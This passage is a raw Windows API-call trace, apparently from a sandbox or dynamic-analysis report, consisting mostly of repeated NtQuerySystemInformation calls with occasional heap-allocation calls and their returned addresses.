(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.097] GetProcessHeap () returned 0x27fc8db0000 [0187.097] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9873c50 [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.100] GetProcessHeap () returned 0x27fc8db0000 [0187.100] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9873cc0 [0187.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.104] GetProcessHeap () returned 0x27fc8db0000 [0187.104] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x30) returned 0x27fc98a69a0 [0187.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.109] GetProcessHeap () returned 0x27fc8db0000 [0187.109] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x5a) returned 0x27fc9873e80 [0187.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.111] GetProcessHeap () returned 0x27fc8db0000 [0187.111] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x76) returned 0x27fc8e47fd0 [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.116] GetProcessHeap () returned 0x27fc8db0000 [0187.116] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x30) returned 0x27fc98a69e0 [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.120] GetProcessHeap () returned 0x27fc8db0000 [0187.120] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x30) returned 0x27fc8e5b780 [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd30, Length=0x20, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdea8, Length=0x30, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd8, Length=0x30, ResultLength=0x0) [0187.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0187.122] 